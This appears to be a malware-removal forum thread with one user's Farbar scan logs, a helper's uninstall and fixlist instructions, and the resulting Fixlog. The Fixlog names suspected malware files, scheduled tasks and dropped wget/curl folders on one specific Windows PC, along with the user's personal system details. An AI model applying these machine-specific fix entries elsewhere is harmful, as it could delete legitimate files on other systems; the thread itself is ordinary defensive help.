FirewallRules: [TCP Query User{EBCB1A48-8CAD-40A0-97C9-A5E7D1969006}C:\users\vladana\appdata\local\popcorn time\node-webkit\popcorn time.exe] => (Allow) C:\users\vladana\appdata\local\popcorn time\node-webkit\popcorn time.exe No File
FirewallRules: [UDP Query User{51B1713E-C3DC-4E9B-8B2E-299D5D7EB37D}C:\users\vladana\appdata\local\popcorn time\node-webkit\popcorn time.exe] => (Allow) C:\users\vladana\appdata\local\popcorn time\node-webkit\popcorn time.exe No File
FirewallRules: [{AD675AD4-8A27-4858-B7BF-64062E576C45}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{FF4764D4-F4A6-4C99-B73E-53F8DE61E6F9}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{61F7EE47-9BA9-4D47-ADB6-5E48B1DF1F11}] => (Allow) c:\program files (x86)\real\realplayer\RPDS\Bin\rpdsvc.exe (RealNetworks, Inc. -> RealNetworks, Inc.)
FirewallRules: [TCP Query User{9DA426E5-870A-46BA-ACD6-3BECCA6D3981}C:\program files (x86)\Java\jre1.8.0_31\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\Java\jre1.8.0_31\bin\jp2launcher.exe No File
FirewallRules: [UDP Query User{E35C77F8-2476-4F58-B62F-633DD6DA4D7B}C:\program files (x86)\Java\jre1.8.0_31\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\Java\jre1.8.0_31\bin\jp2launcher.exe No File
FirewallRules: [TCP Query User{64ADE5CF-E0E0-432A-ADCA-107CEF11A830}C:\program files (x86)\java\jre1.8.0_40\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_40\bin\jp2launcher.exe No File
FirewallRules: [UDP Query User{29E89790-5F1F-403F-9200-85040488F6BF}C:\program files (x86)\java\jre1.8.0_40\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_40\bin\jp2launcher.exe No File
FirewallRules: [TCP Query User{051C8ED1-8257-4C07-9843-3A321CB1D2B5}C:\program files (x86)\Java\jre1.8.0_45\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\Java\jre1.8.0_45\bin\jp2launcher.exe No File
FirewallRules: [UDP Query User{11E9C41A-BB10-4AE0-86A2-D113F4631726}C:\program files (x86)\Java\jre1.8.0_45\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\Java\jre1.8.0_45\bin\jp2launcher.exe No File
FirewallRules: [TCP Query User{1028E6BB-11FD-426E-9846-980F150B8359}C:\users\vladana\appdata\local\popcorn time\nw.exe] => (Allow) C:\users\vladana\appdata\local\popcorn time\nw.exe No File
FirewallRules: [UDP Query User{131B9741-3987-48AB-97A9-8EB722A5AD2D}C:\users\vladana\appdata\local\popcorn time\nw.exe] => (Allow) C:\users\vladana\appdata\local\popcorn time\nw.exe No File
FirewallRules: [{10CC44FD-3D7B-40D9-B4E9-C8B90B3CDA05}] => (Allow) C:\Program Files (x86)\nokia\nokia suite\nokiasuite.exe (Nokia -> Nokia)
FirewallRules: [{0F44D93E-8116-4C28-A09E-375525612959}] => (Allow) C:\Program Files (x86)\Common Files\nokia\service layer\a\nsl_host_process.exe No File
FirewallRules: [{DE2D1B1A-A95A-4427-8BD7-97016C528F99}] => (Allow) C:\Program Files (x86)\Popcorn Time\Updater.exe (Popcorn Time) [File not signed]
FirewallRules: [{023EC48C-AAA6-4832-8DEF-E77068991D61}] => (Allow) C:\Program Files (x86)\Popcorn Time\Updater.exe (Popcorn Time) [File not signed]
FirewallRules: [{ED5D1E50-0E04-48A8-A0FF-52EBBC8DC18D}] => (Allow) C:\Users\Vladana\AppData\Local\Temp\Andy_46.2_x64\Setup.exe No File
FirewallRules: [{A9B6A8FC-243F-45C5-B45E-B94CA201DFA7}] => (Allow) C:\Program Files\Andy\andy.exe No File
FirewallRules: [{59B2491E-5BF2-4DC5-AE8D-F34BD2AC1230}] => (Allow) C:\Program Files\Andy\andy.exe No File
FirewallRules: [{EF33A6D0-D34B-4630-9AE0-D5B6319C642D}] => (Allow) C:\Program Files\Andy\AndyConsole.exe No File
FirewallRules: [{0C8E4F25-226B-4BC9-BBD0-A6FDD1D99E01}] => (Allow) C:\Program Files\Andy\AndyConsole.exe No File
FirewallRules: [{E5EC7B01-738D-42B0-960C-4051ADBF6E85}] => (Allow) C:\Program Files\Andy\SetupFiles\Uninstall.exe No File
FirewallRules: [{28B9FA2D-E66B-453A-9DAB-DDB820A60893}] => (Allow) C:\Program Files\Andy\SetupFiles\Uninstall.exe No File
FirewallRules: [{2F79B4C8-3AFC-4E30-B1B2-EE4203877302}] => (Allow) C:\Users\Vladana\AppData\Local\Temp\Uninstall.exe No File
FirewallRules: [{FEE98E1E-A352-4C6D-A55F-F641B4E69F55}] => (Allow) C:\Users\Vladana\AppData\Local\Temp\Uninstall.exe No File
FirewallRules: [{A16DB9E7-288D-4E5B-BD58-5404E7DED756}] => (Allow) C:\Program Files\Andy\HandyAndy.exe No File
FirewallRules: [{986F830C-A0F0-4829-A1D3-6E209C9346FE}] => (Allow) C:\Program Files\Andy\HandyAndy.exe No File
FirewallRules: [{7AB977CD-EA90-4ECA-865F-E3924B0DEBC6}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe No File
FirewallRules: [{9FDF76F3-5DF0-4A94-B6C4-F6F10388EEDD}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe No File
FirewallRules: [{9E97B312-F759-4491-9B4A-9A7F7BD66B49}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe No File
FirewallRules: [{3B74B220-3059-4A75-949E-50972E487A28}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe No File
FirewallRules: [{187F27A2-9AE2-489B-B927-B8FC03CC268B}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe No File
FirewallRules: [{A9130200-545F-467A-9A36-1B798C073847}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe No File
FirewallRules: [{7F1F91ED-8AE2-4EF5-8A6E-42BCE82D179B}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe No File
FirewallRules: [{5DEA6D27-54CF-4606-949E-BD3C17E5B786}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe No File
FirewallRules: [TCP Query User{DF58AEE1-F55F-4C53-ADDB-ACE482856AE1}C:\users\vladana\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\vladana\appdata\roaming\spotify\spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [UDP Query User{872BEA53-323F-4801-81BF-7FFB853B9696}C:\users\vladana\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\vladana\appdata\roaming\spotify\spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [{8EB9B601-87D3-4318-8ED9-03D843F1590B}] => (Allow) C:\Program Files (x86)\Apowersoft\Video Download Capture 6\Video Download Capture 6.exe (Apowersoft Ltd -> Apowersoft)
FirewallRules: [{597233C9-A6EB-4645-8677-888825AFC9CE}] => (Allow) C:\Program Files (x86)\Apowersoft\Video Download Capture 6\Video Download Capture 6.exe (Apowersoft Ltd -> Apowersoft)
FirewallRules: [{4077A009-74D8-44BE-AD00-C76EEF7EE5BD}] => (Allow) C:\Program Files (x86)\Apowersoft\Video Download Capture 6\rtmpsrv.exe (Apowersoft Ltd -> )
FirewallRules: [{DAE1B584-4569-4BAB-B953-D64ABABDAAD5}] => (Allow) C:\Program Files (x86)\Apowersoft\Video Download Capture 6\rtmpsrv.exe (Apowersoft Ltd -> )
FirewallRules: [TCP Query User{3B57E49F-50A7-468F-A210-D44AA14F7EE4}C:\program files (x86)\keepvid\keepvid pro\downloadres\urlreqservice.exe] => (Allow) C:\program files (x86)\keepvid\keepvid pro\downloadres\urlreqservice.exe (WONBO TECHNOLOGY Co.,LIMITED -> Wondershare)
FirewallRules: [UDP Query User{13BD579F-4B71-49B9-9983-2D442B1932E8}C:\program files (x86)\keepvid\keepvid pro\downloadres\urlreqservice.exe] => (Allow) C:\program files (x86)\keepvid\keepvid pro\downloadres\urlreqservice.exe (WONBO TECHNOLOGY Co.,LIMITED -> Wondershare)
FirewallRules: [{CF745F74-D653-4FD3-8D0D-19E40F7120AE}] => (Allow) C:\Program Files (x86)\Apowersoft\Video Converter Studio\Video Converter Studio.exe No File
FirewallRules: [{AB407DB0-7E44-4FFA-A876-AC39F106ECB0}] => (Allow) C:\Program Files (x86)\Apowersoft\Video Converter Studio\Video Converter Studio.exe No File
FirewallRules: [{6D250D03-52C1-4019-980F-9AC5B16C218B}] => (Allow) C:\Program Files (x86)\Vuze\Azureus.exe (Azureus Software, Inc. -> Azureus Software, Inc)
FirewallRules: [{79C5FF69-9C6C-4795-BBBF-8058548DF184}] => (Allow) C:\Program Files (x86)\Vuze\Azureus.exe (Azureus Software, Inc. -> Azureus Software, Inc)
FirewallRules: [TCP Query User{C22CAF2C-8CE3-4B0E-B3E7-5A8C676B5F8E}C:\program files (x86)\java\jre1.8.0_73\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_73\bin\javaw.exe No File
FirewallRules: [UDP Query User{DCFA2E94-61CF-4517-A82F-AA51C00BB916}C:\program files (x86)\java\jre1.8.0_73\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_73\bin\javaw.exe No File
FirewallRules: [{9B9900F7-F341-4F67-A222-BA5ADB3D415F}] => (Block) C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WShelper.exe No File
FirewallRules: [{C27B1110-1C16-4970-BA34-D7815EC04CD1}] => (Allow) c:\program files (x86)\opera\63.0.3368.107\opera.exe (Opera Software AS -> Opera Software)
FirewallRules: [{5F4157A8-99BC-42D7-9E0B-83BC577FB74E}] => (Allow) c:\program files (x86)\opera\64.0.3417.92\opera.exe (Opera Software AS -> Opera Software)
FirewallRules: [{E312F188-3203-4E00-8BD8-6B9B54F77B8A}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)
 
==================== Restore Points =========================
 
16-11-2019 17:22:21 Removed Betternet for Windows 5.3.0.433
 
==================== Faulty Device Manager Devices ============
 
 
==================== Event log errors: ========================
 
Application errors:
==================
Error: (11/18/2019 06:33:18 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "C:\Program Files (x86)\Nokia\Nokia PC Suite 7\TIS_Windows7PIM.dll".
Dependent Assembly Microsoft.VC80.DebugCRT,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.
 
Error: (11/18/2019 06:30:28 AM) (Source: SideBySide) (EventID: 80) (User: )
Description: Activation context generation failed for "C:\Program Files (x86)\Nero\Nero8\Nero Toolkit\DiscSpeed.exe".Error in manifest or policy file "" on line .
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7600.16661_none_fa62ad231704eab7.manifest.
Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7600.16661_none_420fe3fa2b8113bd.manifest.
 
Error: (11/17/2019 06:59:21 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "C:\Program Files (x86)\Nokia\Nokia PC Suite 7\TIS_Windows7PIM.dll".
Dependent Assembly Microsoft.VC80.DebugCRT,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.
 
Error: (11/17/2019 06:56:25 AM) (Source: SideBySide) (EventID: 80) (User: )
Description: Activation context generation failed for "C:\Program Files (x86)\Nero\Nero8\Nero Toolkit\DiscSpeed.exe".Error in manifest or policy file "" on line .
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7600.16661_none_fa62ad231704eab7.manifest.
Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7600.16661_none_420fe3fa2b8113bd.manifest.
 
Error: (11/16/2019 05:45:44 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: Avira.WebAppHost.exe, version: 2.26.1.17471, time stamp: 0x5d1b0ae0
Faulting module name: KERNELBASE.dll, version: 6.1.7600.17206, time stamp: 0x50e669a2
Exception code: 0xe0434352
Fault offset: 0x000000000000ac3d
Faulting process id: 0x1384
Faulting application start time: 0x01d59c9d496b5e25
Faulting application path: C:\Program Files (x86)\Avira\VPN\Avira.WebAppHost.exe
Faulting module path: C:\Windows\system32\KERNELBASE.dll
Report Id: 87d7a1fc-0890-11ea-992a-2cd44493347b
 
Error: (11/16/2019 05:45:44 PM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Application: Avira.WebAppHost.exe
Framework Version: v4.0.30319
Description: The process was terminated due to an unhandled exception.
Exception Info: System.IO.IOException
Stack:
   at System.IO.__Error.WinIOError(Int32, System.String)
   at System.IO.Directory.InternalCreateDirectory(System.String, System.String, System.Object, Boolean)
   at System.IO.Directory.InternalCreateDirectoryHelper(System.String, Boolean)
   at Avira.VPN.Core.Win.XmlStorage.EnsureFileExists(System.String)
   at Avira.VPN.Core.Win.ProductSettings.get_ClientId()
   at Avira.VPN.Core.Win.GeneratedDeviceInfo.GetClientId()
   at Avira.VPN.Core.Win.Logger.SetDefaultInstance(System.String)
   at Avira.WebAppHost.Program.Main(System.String[])
 
Error: (11/16/2019 05:45:25 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: Avira.VpnService.exe, version: 2.26.1.17464, time stamp: 0x5d1b0ad1
Faulting module name: KERNELBASE.dll, version: 6.1.7600.17206, time stamp: 0x50e669a2
Exception code: 0xe0434352
Fault offset: 0x000000000000ac3d
Faulting process id: 0x410
Faulting application start time: 0x01d59c9d3e008838
Faulting application path: C:\Program Files (x86)\Avira\VPN\Avira.VpnService.exe
Faulting module path: C:\Windows\system32\KERNELBASE.dll
Report Id: 7c39111e-0890-11ea-992a-2cd44493347b
 
Error: (11/16/2019 05:45:25 PM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Application: Avira.VpnService.exe
Framework Version: v4.0.30319
Description: The process was terminated due to an unhandled exception.
Exception Info: System.IO.IOException
Stack:
   at System.IO.__Error.WinIOError(Int32, System.String)
   at System.IO.Directory.InternalCreateDirectory(System.String, System.String, System.Object, Boolean)
   at System.IO.Directory.InternalCreateDirectoryHelper(System.String, Boolean)
   at Avira.VPN.Core.Win.XmlStorage.EnsureFileExists(System.String)
   at Avira.VPN.Core.Win.ProductSettings.get_ClientId()
   at Avira.VPN.Core.Win.GeneratedDeviceInfo.GetClientId()
   at Avira.VPN.Core.Win.Logger.SetDefaultInstance(System.String)
   at Avira.VpnService.Program.Main(System.String[])
 
 
System errors:
=============
Error: (11/18/2019 02:02:49 PM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The Windows Update service hung on starting.
 
Error: (11/18/2019 01:55:46 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Hotspot Shield Service service failed to start due to the following error: 
The service did not respond to the start or control request in a timely fashion.
 
Error: (11/18/2019 01:55:46 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Hotspot Shield Service service to connect.
 
Error: (11/18/2019 01:55:14 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Freemake Improver service failed to start due to the following error: 
The service did not respond to the start or control request in a timely fashion.
 
Error: (11/18/2019 01:55:14 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Freemake Improver service to connect.
 
Error: (11/17/2019 12:22:01 AM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The Windows Update service hung on starting.
 
Error: (11/17/2019 12:16:26 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Hotspot Shield Service service failed to start due to the following error: 
The service did not respond to the start or control request in a timely fashion.
 
Error: (11/17/2019 12:16:26 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Hotspot Shield Service service to connect.
 
 
CodeIntegrity:
===================================
 
Date: 2019-11-18 14:50:24.854
Description: 
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\sxs.dll because the set of per-page image hashes could not be found on the system.
 
Date: 2019-11-18 14:42:32.679
Description: 
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\sxs.dll because the set of per-page image hashes could not be found on the system.
 
Date: 2019-11-18 14:17:39.679
Description: 
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\sxs.dll because the set of per-page image hashes could not be found on the system.
 
Date: 2019-11-18 13:59:29.956
Description: 
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\sxs.dll because the set of per-page image hashes could not be found on the system.
 
Date: 2019-11-18 13:52:56.204
Description: 
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\sxs.dll because the set of per-page image hashes could not be found on the system.
 
Date: 2019-11-18 13:40:37.935
Description: 
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\sxs.dll because the set of per-page image hashes could not be found on the system.
 
Date: 2019-11-18 13:22:57.872
Description: 
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\sxs.dll because the set of per-page image hashes could not be found on the system.
 
Date: 2019-11-18 11:49:09.688
Description: 
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\sxs.dll because the set of per-page image hashes could not be found on the system.
 
==================== Memory info =========================== 
 
BIOS: FUJITSU // Phoenix Technologies Ltd. Version 1.08 10/02/2012
Motherboard: FUJITSU FJNBB29
Processor: Intel® Pentium® CPU B960 @ 2.20GHz
Percentage of memory in use: 96%
Total physical RAM: 3447.63 MB
Available physical RAM: 117.55 MB
Total Virtual: 6893.39 MB
Available Virtual: 2494.93 MB
 
==================== Drives ================================
 
Drive c: () (Fixed) (Total:97.56 GB) (Free:18.94 GB) NTFS
Drive d: (New Volume) (Fixed) (Total:368.1 GB) (Free:203.89 GB) NTFS
 
\\?\Volume{da4eedc3-7be1-11e2-8ac3-806e6f6e6963}\ () (Fixed) (Total:0.1 GB) (Free:0.07 GB) NTFS
 
==================== MBR & Partition Table ====================
 
==========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 465.8 GB) (Disk ID: EB90EB90)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=97.6 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=368.1 GB) - (Type=07 NTFS)
 
==================== End of Addition.txt =======================

#4
RKinner

    Malware Expert

  • Expert
  • 24,598 posts
  • MVP

Uninstall:

  • Hotspot Shield
  • RelevantKnowledge
  • Nero 8
  • Nokia PC Suite

Download the attached fixlist.txt to the same location as FRST.

Attached File  fixlist.txt   16.79KB   459 downloads

Run FRST and press Fix.
A fix log will be generated; please post that.

Reboot if the fix doesn't reboot it for you.

Run FRST again as before.  Make sure Addition.txt is checked and hit Scan.  Post both logs.

#5
vladana_91

    Member

  • Topic Starter
  • 18 posts

I uninstalled all the programs listed but before I continue - is it normal to get this error window saying "AutoIt Error, Line 17928 (File “C:\Users\Vladana\Desktop\FRST64.exe”): Error Variable used without being declared." when I run FRST and press Fix?

 

I did get a fixlog file, but I don't know if I was supposed to get this error window?

 

 


Edited by vladana_91, 18 November 2019 - 01:12 PM.

#6
vladana_91

    Member

  • Topic Starter
  • 18 posts

Okay, under the assumption that the error window was supposed to appear, I followed your instructions further, so here is the copy of Fixlog.txt:

 

Fix result of Farbar Recovery Scan Tool (x64) Version: 14-11-2019
Ran by Vladana (18-11-2019 19:53:29) Run:3
Running from C:\Users\Vladana\Desktop
Loaded Profiles: Vladana (Available Profiles: Vladana)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
Task: {0D4A518A-DF9A-4EF5-B2C9-BCCA25713362} - System32\Tasks\{3A66CE80-4733-4203-9F7A-462BED78E89F} => C:\Windows\system32\pcalua.exe -a E:\Boot\Setup.exe -d E:\
Task: {BA2E555B-536B-40B0-8F32-8AE50F08B90F} - System32\Tasks\igfxhk => C:\Users\Vladana\AppData\Roaming\Terq\srvce.exe
C:\Users\Vladana\AppData\Roaming\Terq
Task: {D00D3C68-28B6-430D-83FD-061E0EAFCDA9} - System32\Tasks\{9194DE95-4B06-4F9D-B927-18DB5B401FBF} => C:\Windows\system32\pcalua.exe -a C:\Users\Vladana\AppData\Local\TNT2\2.0.0.1534\TNT2User.exe -c /UNINSTALL PARTNER=10513
C:\Users\Vladana\AppData\Local\TNT2
Toolbar: HKLM - avast! Online Security - {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} -  No File
Toolbar: HKLM - No Name - {CC1A175A-E45B-41ED-A30C-C9B1D7A0C02F} -  No File
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} -  No File
Handler: WSKVAllmytubechrome - {91AB862D-07B8-4A85 -  No File
FF Plugin HKU\S-1-5-21-7682389-3612777877-391866582-1000: pokki.com/PokkiDownloadHelper -> C:\Users\Vladana\AppData\Local\Pokki\Download Helper\npPokkiDownloadHelper.1.2.0.78.dll [No File]
FF Plugin HKU\S-1-5-21-7682389-3612777877-391866582-1000: torrents-time.com/TTPlugin -> C:\Program Files (x86)\TorrentsTime Media Player\bin\npTTPlugin.dll [No File]
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx <not found>
CHR HKLM-x32\...\Chrome\Extension: [jbolfgndggfhhpbnkgnpjkfhinclbigj] - <no Path/update_url>
S3 WsDrvInst; C:\Program Files (x86)\iSkysoft\iSkysoft iTransfer\DriverInstall.exe [X]
U3 avgbu57v; C:\Windows\System32\Drivers\avgbu57v.sys [0 0000-00-00] (Microsoft Corporation) <==== ATTENTION (zero byte File/Folder)
U4 ekrn; no ImagePath
S3 taphss6; system32\DRIVERS\taphss6.sys [X]
S3 vmci; \SystemRoot\system32\DRIVERS\vmci.sys [X]
S3 VMnetAdapter; system32\DRIVERS\vmnetadapter.sys [X]
CMD: dir C:\Windows\Wget
CMD: dir C:\Windows\Curl
CMD: type c:\windows\e.bat
CMD: type c:\windows\y.txt
CMD: type c:\windows\d.bat
CMD: type C:\Windows\mgr_n.reg
CMD: type  C:\Windows\mgr_f.reg
CMD: type  C:\Windows\e.reg
VirusTotal: C:\Windows\e.exe
VirusTotal: C:\Windows\d.exe
VirusTotal: C:\Windows\fr.exe
2019-11-17 00:17 - 2019-10-21 20:51 - 000002930 _____ C:\Windows\e.bat
2019-11-17 00:17 - 2019-07-30 17:00 - 000004608 _____ () C:\Windows\e.exe
2019-11-17 00:16 - 2019-09-12 17:27 - 000025600 _____ () C:\Windows\fr.exe
2019-11-16 16:28 - 2019-11-16 16:28 - 000000000 ____D C:\Windows\Wget
2019-11-16 16:28 - 2019-11-16 16:28 - 000000000 ____D C:\Windows\curl
2019-11-16 16:28 - 2019-10-12 19:40 - 000004608 _____ () C:\Windows\d.exe
2019-11-16 16:28 - 2019-09-12 15:16 - 000001241 _____ C:\Windows\d.bat
2019-11-16 16:28 - 2019-08-09 16:30 - 000000001 _____ C:\Windows\y.txt
2019-11-16 16:28 - 2019-08-09 15:28 - 000000302 _____ C:\Windows\mgr_n.reg
2019-11-16 16:28 - 2019-08-09 15:28 - 000000302 _____ C:\Windows\mgr_f.reg
2019-11-16 16:28 - 2019-08-09 15:28 - 000000290 _____ C:\Windows\e.reg
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{0F22A205-CFB0-4679-8499-A6F44A80A208}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.25.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{1423F872-3F7F-4E57-B621-8B1A9D49B448}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.27.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{144DF3B2-2402-47AE-9583-5A045929A8D4}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.33.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{355EC88A-02E2-4547-9DEE-F87426484BD1}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.23.9\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{590C4387-5EBD-4D46-8A84-CD0BA2EF2856}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.30.3\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{59B55F04-DE14-4BB8-92FF-C4A22EF2E5F4}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.31.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{5C8C2A98-6133-4EBA-BBCC-34D9EA01FC2E}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.28.1\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{62634D95-960B-4834-8E71-A70408AD8FD9}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.34.7\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{78550997-5DEF-4A8A-BAF9-D5774E87AC98}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.28.13\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{793EE463-1304-471C-ADF1-68C2FFB01247}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.29.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{84EB3779-151B-4C71-AEF0-A0FEE9481401}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.34.11\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{8C46158B-D978-483C-A312-16EE5013BE04}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.33.3\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.24.15\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{91A41FCC-BC02-42D8-A36E-0D27FF9BFFC8}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.33.7\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.33.23\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.26.9\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.32.7\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{CC182BE1-84CE-4A57-B85C-FD4BBDF78CB2}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.29.1\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{D0336C0B-7919-4C04-8CCE-2EBAE2ECE8C9}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.25.11\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{D1EDC4F5-7F4D-4B12-906A-614ECF66DDAF}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.28.15\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.33.17\psuser_64.dll => No File
